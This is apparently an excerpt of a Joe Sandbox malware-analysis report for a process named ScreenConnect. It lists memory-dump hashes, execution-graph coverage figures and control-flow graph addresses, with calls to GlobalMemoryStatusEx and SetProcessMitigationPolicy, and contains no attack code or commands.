                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 585ffe74928692dd6f50b07c6fe6b99c128fb2d25376178a03825889af239593
                                                                • Instruction ID: 70d609469e5c3dc8642a19d6b80748496df9d70e581b0eb37d1b2f2002e9c6bb
                                                                • Opcode Fuzzy Hash: 585ffe74928692dd6f50b07c6fe6b99c128fb2d25376178a03825889af239593
                                                                • Instruction Fuzzy Hash: BCF06D2144E2964FD35297B098A5AE47FF4EF47210B0F42E7E884CB4B3D90C5D8A83B2
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 477a4374a3d0fd79bbcac9c6ff102969f42be5c8a9717460857c8f1c94700bab
                                                                • Instruction ID: 9f5a18f443f2d11227479a5973345ed9c0b5918a4c0938cd0d3bb0b3965ed37d
                                                                • Opcode Fuzzy Hash: 477a4374a3d0fd79bbcac9c6ff102969f42be5c8a9717460857c8f1c94700bab
                                                                • Instruction Fuzzy Hash: EFE0D82150F3D40FDB539B34C4688E43F60EE1721030901EBD481CF0B3E5148A89C751
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 59d6ffd4b789994f4b84a3060b34465e726003487ff530fcb9ed8544cb82eef6
                                                                • Instruction ID: 0dcfc0d9da17978b2c3f3fa931a8c3081049b923eb732f426b17ea2b071d7bc9
                                                                • Opcode Fuzzy Hash: 59d6ffd4b789994f4b84a3060b34465e726003487ff530fcb9ed8544cb82eef6
                                                                • Instruction Fuzzy Hash: 2AE08C1AA4E71B02FB7C62B578A17B570D09F06359F4A527EE41E800E9DC9C9E808962
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b97fccc7889625f5eca2ee109298a8560da280eeae52af600eda47cd04acfe8f
                                                                • Instruction ID: cb2a0b5e5d37122c73e409a5a8295ef909aeac42d0da15acbfe337e14620ad8c
                                                                • Opcode Fuzzy Hash: b97fccc7889625f5eca2ee109298a8560da280eeae52af600eda47cd04acfe8f
                                                                • Instruction Fuzzy Hash: 40C04C11B6996D0A95E8A25C34656FC41C1D78866578916F2E80CD229EEC4C5D9213C1
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 065b225b4bd21a7db7e91e9574bd1d4eabdd0240b98abe7cfcf9def78f5a9bbd
                                                                • Instruction ID: 2b426b4b892e66926e38079b7d152408c710202f45e844ca4b5c0168b749b047
                                                                • Opcode Fuzzy Hash: 065b225b4bd21a7db7e91e9574bd1d4eabdd0240b98abe7cfcf9def78f5a9bbd
                                                                • Instruction Fuzzy Hash: 8DC09B10F1E64E46F364EFA8C47567D21526FCC208B564535D04D8A1A6CD3C67016545
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 81f7068886334a1449be0078e8a23011a27193cba12888c68009e0ed2993e715
                                                                • Instruction ID: 3cf0476b2c3aec2e7e4992c20cd59567a13fbe2b9e5e6cc78176976459b75f3b
                                                                • Opcode Fuzzy Hash: 81f7068886334a1449be0078e8a23011a27193cba12888c68009e0ed2993e715
                                                                • Instruction Fuzzy Hash: 46A00200F4FA1E45E17165D8402127D50410F95608A265635D04E8A1B6CD2C6F4265A6

                                                                Execution Graph

                                                                Execution Coverage:11.3%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:10
                                                                Total number of Limit Nodes:2
                                                                execution_graph 18280 7ffd9b7292c4 18283 7ffd9b7292cd 18280->18283 18281 7ffd9b729485 GlobalMemoryStatusEx 18282 7ffd9b729495 18281->18282 18283->18281 18284 7ffd9b729287 18283->18284 18285 7ffd9b418014 18287 7ffd9b41801d 18285->18287 18286 7ffd9b418082 18287->18286 18288 7ffd9b4180f6 SetProcessMitigationPolicy 18287->18288 18289 7ffd9b418152 18288->18289

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 124 7ffd9b7292c4-7ffd9b7292cb 125 7ffd9b7292cd-7ffd9b7292d5 124->125 126 7ffd9b7292d6-7ffd9b7292ea 124->126 125->126 127 7ffd9b729287-7ffd9b7292bf 126->127 128 7ffd9b7292ec-7ffd9b72933a 126->128 134 7ffd9b729384-7ffd9b729397 128->134 135 7ffd9b72933c-7ffd9b729365 128->135 142 7ffd9b729408-7ffd9b729409 134->142 143 7ffd9b729399-7ffd9b72939d 134->143 136 7ffd9b7293be 135->136 137 7ffd9b729367-7ffd9b72936a 135->137 141 7ffd9b7293bf 136->141 139 7ffd9b7293eb-7ffd9b7293ef 137->139 140 7ffd9b72936c-7ffd9b72936e 137->140 164 7ffd9b7293f0 139->164 144 7ffd9b729370 140->144 145 7ffd9b7293ea 140->145 146 7ffd9b7293c0 141->146 147 7ffd9b72943b-7ffd9b72943d 141->147 150 7ffd9b729485-7ffd9b729493 GlobalMemoryStatusEx 142->150 151 7ffd9b72940b-7ffd9b72941c 142->151 148 7ffd9b72939f-7ffd9b7293a1 143->148 149 7ffd9b72941e-7ffd9b72941f 143->149 156 7ffd9b7293b3 144->156 157 7ffd9b729372-7ffd9b729374 144->157 145->139 158 7ffd9b729441-7ffd9b729467 146->158 159 7ffd9b7293c1 146->159 147->158 162 7ffd9b72941d 148->162 163 7ffd9b7293a3-7ffd9b7293a7 148->163 153 7ffd9b729420-7ffd9b729421 149->153 154 7ffd9b729469-7ffd9b729482 149->154 160 7ffd9b729495 150->160 161 7ffd9b72949b-7ffd9b7294c2 150->161 151->162 166 7ffd9b729423-7ffd9b729428 153->166 154->150 168 7ffd9b72942f-7ffd9b729433 156->168 169 7ffd9b7293b5 156->169 157->164 165 7ffd9b729376 157->165 158->154 171 7ffd9b729403-7ffd9b729407 159->171 172 7ffd9b7293c2-7ffd9b7293c6 159->172 160->161 162->149 163->166 167 7ffd9b7293a9 163->167 177 7ffd9b729378-7ffd9b72937a 165->177 178 7ffd9b7293b9 165->178 174 7ffd9b729429-7ffd9b72942e 166->174 167->139 173 7ffd9b7293ab-7ffd9b7293ad 167->173 179 7ffd9b729435-7ffd9b72943a 168->179 175 7ffd9b7293f7-7ffd9b7293f9 169->175 176 7ffd9b7293b6-7ffd9b7293b7 169->176 171->142 180 7ffd9b7293c8-7ffd9b7293da 172->180 181 7ffd9b7293db-7ffd9b7293e9 172->181 173->174 186 7ffd9b7293af-7ffd9b7293b1 173->186 174->168 184 7ffd9b7293ff 175->184 185 7ffd9b7293fb-7ffd9b7293fe 175->185 176->178 182 7ffd9b7293f6 177->182 183 7ffd9b72937c 177->183 178->179 187 7ffd9b7293bb-7ffd9b7293bd 178->187 179->147 180->181 181->145 182->175 183->141 188 7ffd9b72937e-7ffd9b729381 183->188 189 7ffd9b729400-7ffd9b729401 184->189 190 7ffd9b729402 184->190 185->184 186->156 187->136 188->189 192 7ffd9b729383 188->192 189->190 190->171 192->134
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.1749264470.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: GlobalMemoryStatus
                                                                • String ID:
                                                                • API String ID: 1890195054-0
                                                                • Opcode ID: d8c8411b996986d3e45486436c0ff9ea9c9da71e8e338117a88713455159f271
                                                                • Instruction ID: 39a635ce29cfa1466f49145c26afcb293bd1eda700672c477f24b415fabb5144
                                                                • Opcode Fuzzy Hash: d8c8411b996986d3e45486436c0ff9ea9c9da71e8e338117a88713455159f271
                                                                • Instruction Fuzzy Hash: D9910971A0E78D4FEB7597A888296F97BE0EF51320F0902BAD08DC75F3DA58650AC741

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.1746913767.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ffd9b410000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: MitigationPolicyProcess
                                                                • String ID:
                                                                • API String ID: 1088084561-0
                                                                • Opcode ID: a881bc39b8613701678b3faa1e0cc88647291f7001010518ee51a4391c12c3ad
                                                                • Instruction ID: 8814354eb268e044d2c4550dd507c647ccc7541b7a5639f78e8758f4612157e3
                                                                • Opcode Fuzzy Hash: a881bc39b8613701678b3faa1e0cc88647291f7001010518ee51a4391c12c3ad
                                                                • Instruction Fuzzy Hash: 66514B31D1DB4D4FDB289FA89C4A5E97BE0EF65310F04017FE489C3192DE68A846C792